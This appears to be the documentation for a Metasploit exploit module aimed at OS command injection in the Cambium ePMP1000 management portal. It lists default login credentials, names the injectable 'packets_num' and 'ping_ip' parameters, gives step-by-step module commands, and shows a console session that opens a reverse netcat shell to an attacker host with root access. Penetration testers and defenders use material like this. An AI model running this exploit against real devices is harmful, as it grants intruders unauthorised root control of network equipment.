This module exploits an OS Command Injection vulnerability in Cambium ePMP1000 device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to set up a reverse netcat shell.

This module injects the payload in 'packets_num' parameter. Alternatively, a second, vulnerable parameter 'ping_ip' can also be used.

Note: `cmd/unix/reverse_netcat` is the only payload that seems to work and is stable. After the session is opened, there may be a slight delay in response after first command is issued. There are no delays in receiving responses to subsequent command(s). It is recommended to use 'exploit -j'.

## Verification Steps

1. Do: ```use exploit/unix/http/epmp1000_ping_cmd_shell```
2. Do: ```set RHOST [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```set LHOST [IP]```
5. Do: ```exploit -j```

## Scenarios

  ```
msf > use use exploit/unix/http/epmp1000_ping_cmd_shell
msf exploit(epmp1000_ping_cmd_shell) > set RHOST 192.168.0.2
msf exploit(epmp1000_ping_cmd_shell) > set RPORT 80
msf exploit(epmp1000_ping_cmd_shell) > set LHOST 192.168.0.104
msf exploit(epmp1000_ping_cmd_shell) > exploit -j

[*] Started reverse TCP handler on 192.168.0.104:4444
[+] SUCCESSFUL LOGIN - 192.168.0.2:80 - "installer":"installer"
[*] Sending payload...
[*] Command shell session 10 opened (192.168.0.104:4444 -> 192.168.0.2:43594) at 2017-12-02 06:08:00 +0700

msf exploit(epmp1000_ping_cmd_shell) > sessions -l

Active sessions
===============

  Id  Type            Information  Connection
  --  ----            -----------  ----------
  10   shell cmd/unix               192.168.0.104:4444 -> 192.168.0.2:43594 (192.168.0.2)

msf exploit(epmp1000_ping_cmd_shell) > sessions -i 10
[*] Starting interaction with 10...

id
uid=0(root) gid=0(root)

  ```